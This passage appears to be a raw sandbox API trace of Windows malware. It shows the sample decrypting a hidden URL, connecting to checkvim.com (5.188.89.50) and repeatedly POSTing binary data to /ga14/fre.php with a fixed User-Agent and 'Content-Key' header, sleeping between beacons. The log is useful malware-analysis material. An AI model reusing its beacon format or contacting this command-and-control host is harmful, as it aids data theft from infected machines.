() returned 0x840000 [0292.271] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8711a0 | out: hHeap=0x840000) returned 1 [0292.272] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x8825d8, dwCreationFlags=0x0, lpThreadId=0x19fbb0 | out: lpThreadId=0x19fbb0*=0x9b0) returned 0x498 [0292.273] Sleep (dwMilliseconds=0xea60) [0292.283] GetProcessHeap () returned 0x840000 [0292.283] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fb00 [0292.284] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0292.284] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0292.290] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0292.290] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f8a8) returned 1 [0292.296] GetProcessHeap () returned 0x840000 [0292.296] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870848 [0292.297] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0292.297] CryptImportKey (in: hProv=0x86f8a8, pbData=0x870848, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e3b0) returned 1 [0292.298] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0292.298] CryptSetKeyParam (hKey=0x87e3b0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0292.299] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0292.303] CryptSetKeyParam (hKey=0x87e3b0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0292.303] GetProcessHeap () returned 0x840000 [0292.303] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870848 | out: hHeap=0x840000) returned 1 [0292.304] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0292.305] CryptDecrypt (in: hKey=0x87e3b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fb00, pdwDataLen=0x19f9a4 | out: pbData=0x87fb00, pdwDataLen=0x19f9a4) returned 1 [0292.305] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0292.306] CryptDestroyKey (hKey=0x87e3b0) returned 1 [0292.306] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0292.307] CryptReleaseContext (hProv=0x86f8a8, dwFlags=0x0) returned 1 [0292.307] GetProcessHeap () returned 0x840000 [0292.307] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0292.307] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0292.308] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0292.308] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0292.309] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0292.309] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0292.310] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0292.310] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0292.311] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0292.311] GetProcessHeap () returned 0x840000 [0292.311] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x8712e0 [0292.311] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x0) returned 11001 [0292.311] GetProcessHeap () returned 0x840000 [0292.311] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8712e0 | out: hHeap=0x840000) returned 1 [0292.311] GetProcessHeap () returned 0x840000 [0292.311] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0292.311] GetProcessHeap () returned 0x840000 [0292.311] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fb00 | out: hHeap=0x840000) returned 1 [0292.311] GetProcessHeap () returned 0x840000 [0292.311] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fd88 [0292.312] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0292.312] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0292.317] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0292.318] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f688) returned 1 [0292.323] GetProcessHeap () returned 0x840000 [0292.323] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870848 [0292.324] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0292.324] CryptImportKey (in: hProv=0x86f688, pbData=0x870848, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e7b0) returned 1 [0292.324] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0292.325] CryptSetKeyParam (hKey=0x87e7b0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0292.325] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0292.325] CryptSetKeyParam (hKey=0x87e7b0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0292.325] GetProcessHeap () returned 0x840000 [0292.325] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870848 | out: hHeap=0x840000) returned 1 [0292.326] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0292.326] CryptDecrypt (in: hKey=0x87e7b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fd88, pdwDataLen=0x19f9a4 | out: pbData=0x87fd88, pdwDataLen=0x19f9a4) returned 1 [0292.327] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0292.327] CryptDestroyKey (hKey=0x87e7b0) returned 1 [0292.327] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0292.328] CryptReleaseContext (hProv=0x86f688, dwFlags=0x0) returned 1 [0292.328] GetProcessHeap () returned 0x840000 [0292.328] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0292.328] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0292.328] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0292.329] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0292.329] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0292.330] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0292.330] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0292.330] GetProcessHeap () returned 0x840000 [0292.330] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871600 [0292.330] getaddrinfo (in: pNodeName="checkvim.com", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x871538*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878b60*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0292.331] GetProcessHeap () returned 0x840000 [0292.331] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871b08 [0292.331] socket (af=2, type=1, protocol=6) returned 0x49c [0292.331] connect (s=0x49c, name=0x878b60*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0292.397] FreeAddrInfoW (pAddrInfo=0x871538*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878b60*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0292.398] GetProcessHeap () returned 0x840000 [0292.398] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7d) returned 0x86fce8 [0292.398] GetProcessHeap () returned 0x840000 [0292.398] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8845b8 [0292.399] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0292.400] wvsprintfA (in: param_1=0x8845b8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0292.400] GetProcessHeap () returned 0x840000 [0292.400] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x870448 [0292.400] GetProcessHeap () returned 0x840000 [0292.400] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8845b8 | out: hHeap=0x840000) returned 1 [0292.400] GetProcessHeap () returned 0x840000 [0292.400] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87f680 [0292.400] GetProcessHeap () returned 0x840000 [0292.400] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1fdc) returned 0x8845b8 [0292.401] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0292.402] wvsprintfA (in: param_1=0x8845b8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 66369A18\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0292.402] GetProcessHeap () returned 0x840000 [0292.402] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x873a58 [0292.402] GetProcessHeap () returned 0x840000 [0292.402] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8845b8 | out: hHeap=0x840000) returned 1 [0292.402] send (s=0x49c, buf=0x873a58*, len=237, flags=0) returned 237 [0292.403] send (s=0x49c, buf=0x87eb58*, len=159, flags=0) returned 159 [0292.403] GetProcessHeap () returned 0x840000 [0292.403] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x8825d8 [0292.403] recv (in: s=0x49c, buf=0x8825d8, len=4048, flags=0 | out: buf=0x8825d8*) returned 237 [0292.776] GetProcessHeap () returned 0x840000 [0292.776] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0292.777] GetProcessHeap () returned 0x840000 [0292.777] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f680 | out: hHeap=0x840000) returned 1 [0292.777] GetProcessHeap () returned 0x840000 [0292.777] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870448 | out: hHeap=0x840000) returned 1 [0292.777] GetProcessHeap () returned 0x840000 [0292.777] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x86fce8 | out: hHeap=0x840000) returned 1 [0292.777] closesocket (s=0x49c) returned 0 [0292.777] GetProcessHeap () returned 0x840000 [0292.777] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871b08 | out: hHeap=0x840000) returned 1 [0292.777] GetProcessHeap () returned 0x840000 [0292.777] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0292.777] GetProcessHeap () returned 0x840000 [0292.777] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fd88 | out: hHeap=0x840000) returned 1 [0292.777] GetProcessHeap () returned 0x840000 [0292.777] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871600 | out: hHeap=0x840000) returned 1 [0292.778] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x8825d8, dwCreationFlags=0x0, lpThreadId=0x19fbb0 | out: lpThreadId=0x19fbb0*=0x580) returned 0x49c [0292.779] Sleep (dwMilliseconds=0xea60) [0292.785] GetProcessHeap () returned 0x840000 [0292.785] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fea8 [0292.786] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0292.786] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0292.791] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0292.791] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f688) returned 1 [0292.796] GetProcessHeap () returned 0x840000 [0292.796] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x8708a8 [0292.796] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0292.797] CryptImportKey (in: hProv=0x86f688, pbData=0x8708a8, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e2f0) returned 1 [0292.797] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0292.797] CryptSetKeyParam (hKey=0x87e2f0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0292.798] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0292.799] CryptSetKeyParam (hKey=0x87e2f0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0292.799] GetProcessHeap () returned 0x840000 [0292.799] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8708a8 | out: hHeap=0x840000) returned 1 [0292.799] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0292.800] CryptDecrypt (in: hKey=0x87e2f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fea8, pdwDataLen=0x19f9a4 | out: pbData=0x87fea8, pdwDataLen=0x19f9a4) returned 1 [0292.800] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0292.801] CryptDestroyKey (hKey=0x87e2f0) returned 1 [0292.801] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0292.801] CryptReleaseContext (hProv=0x86f688, dwFlags=0x0) returned 1 [0292.802] GetProcessHeap () returned 0x840000 [0292.802] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x873300 [0292.802] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0292.802] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0292.803] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0292.803] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0292.804] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0292.805] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0292.805] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0292.805] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0292.805] GetProcessHeap () returned 0x840000 [0292.805] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871420 [0292.805] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x0) returned 11001 [0292.806] GetProcessHeap () returned 0x840000 [0292.806] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871420 | out: hHeap=0x840000) returned 1 [0292.806] GetProcessHeap () returned 0x840000 [0292.806] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873300 | out: hHeap=0x840000) returned 1 [0292.806] GetProcessHeap () returned 0x840000 [0292.806] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fea8 | out: hHeap=0x840000) returned 1 [0292.806] GetProcessHeap () returned 0x840000 [0292.806] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87f9e0 [0292.806] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0292.806] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0292.810] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0292.811] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86fac8) returned 1 [0292.815] GetProcessHeap () returned 0x840000 [0292.815] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870848 [0292.816] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0292.816] CryptImportKey (in: hProv=0x86fac8, pbData=0x870848, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e370) returned 1 [0292.817] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0292.817] CryptSetKeyParam (hKey=0x87e370, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0292.817] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0292.818] CryptSetKeyParam (hKey=0x87e370, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0292.818] GetProcessHeap () returned 0x840000 [0292.818] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870848 | out: hHeap=0x840000) returned 1 [0292.818] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0292.819] CryptDecrypt (in: hKey=0x87e370, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87f9e0, pdwDataLen=0x19f9a4 | out: pbData=0x87f9e0, pdwDataLen=0x19f9a4) returned 1 [0292.819] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0292.819] CryptDestroyKey (hKey=0x87e370) returned 1 [0292.820] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0292.821] CryptReleaseContext (hProv=0x86fac8, dwFlags=0x0) returned 1 [0292.821] GetProcessHeap () returned 0x840000 [0292.821] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x873300 [0292.821] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0292.821] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0292.822] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0292.822] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0292.823] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0292.823] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0292.823] GetProcessHeap () returned 0x840000 [0292.823] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871218 [0292.823] getaddrinfo (in: pNodeName="checkvim.com", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x871290*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x8789c8*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0292.824] GetProcessHeap () returned 0x840000 [0292.824] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871c08 [0292.825] socket (af=2, type=1, protocol=6) returned 0x4a0 [0292.825] connect (s=0x4a0, name=0x8789c8*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0292.891] FreeAddrInfoW (pAddrInfo=0x871290*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x8789c8*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0292.891] GetProcessHeap () returned 0x840000 [0292.891] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7d) returned 0x86f710 [0292.891] GetProcessHeap () returned 0x840000 [0292.891] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8845b8 [0292.892] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0292.893] wvsprintfA (in: param_1=0x8845b8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0292.893] GetProcessHeap () returned 0x840000 [0292.893] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x87f4f0 [0292.893] GetProcessHeap () returned 0x840000 [0292.893] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8845b8 | out: hHeap=0x840000) returned 1 [0292.893] GetProcessHeap () returned 0x840000 [0292.893] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87fd88 [0292.893] GetProcessHeap () returned 0x840000 [0292.893] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1fdc) returned 0x8845b8 [0292.894] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0292.895] wvsprintfA (in: param_1=0x8845b8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 66369A18\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0292.895] GetProcessHeap () returned 0x840000 [0292.895] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x873a58 [0292.895] GetProcessHeap () returned 0x840000 [0292.895] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8845b8 | out: hHeap=0x840000) returned 1 [0292.895] send (s=0x4a0, buf=0x873a58*, len=237, flags=0) returned 237 [0292.895] send (s=0x4a0, buf=0x87eb58*, len=159, flags=0) returned 159 [0292.895] GetProcessHeap () returned 0x840000 [0292.896] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x8825d8 [0292.896] recv (in: s=0x4a0, buf=0x8825d8, len=4048, flags=0 | out: buf=0x8825d8*) returned 237 [0293.253] GetProcessHeap () returned 0x840000 [0293.253] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0293.253] GetProcessHeap () returned 0x840000 [0293.253] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fd88 | out: hHeap=0x840000) returned 1 [0293.253] GetProcessHeap () returned 0x840000 [0293.254] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f4f0 | out: hHeap=0x840000) returned 1 [0293.254] GetProcessHeap () returned 0x840000 [0293.254] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x86f710 | out: hHeap=0x840000) returned 1 [0293.254] closesocket (s=0x4a0) returned 0 [0293.254] GetProcessHeap () returned 0x840000 [0293.254] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871c08 | out: hHeap=0x840000) returned 1 [0293.254] GetProcessHeap () returned 0x840000 [0293.254] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873300 | out: hHeap=0x840000) returned 1 [0293.254] GetProcessHeap () returned 0x840000 [0293.254] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f9e0 | out: hHeap=0x840000) returned 1 [0293.254] GetProcessHeap () returned 0x840000 [0293.254] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871218 | out: hHeap=0x840000) returned 1 [0293.254] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x8825d8, dwCreationFlags=0x0, lpThreadId=0x19fbb0 | out: lpThreadId=0x19fbb0*=0x858) returned 0x4a0 [0293.256] Sleep (dwMilliseconds=0xea60) [0293.267] GetProcessHeap () returned 0x840000 [0293.268] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87f998 [0293.268] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0293.269] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0293.274] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0293.275] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f798) returned 1 [0293.281] GetProcessHeap () returned 0x840000 [0293.281] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870848 [0293.282] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0293.282] CryptImportKey (in: hProv=0x86f798, pbData=0x870848, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e970) returned 1 [0293.283] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0293.284] CryptSetKeyParam (hKey=0x87e970, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0293.284] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0293.285] CryptSetKeyParam (hKey=0x87e970, dwParam=0x1, 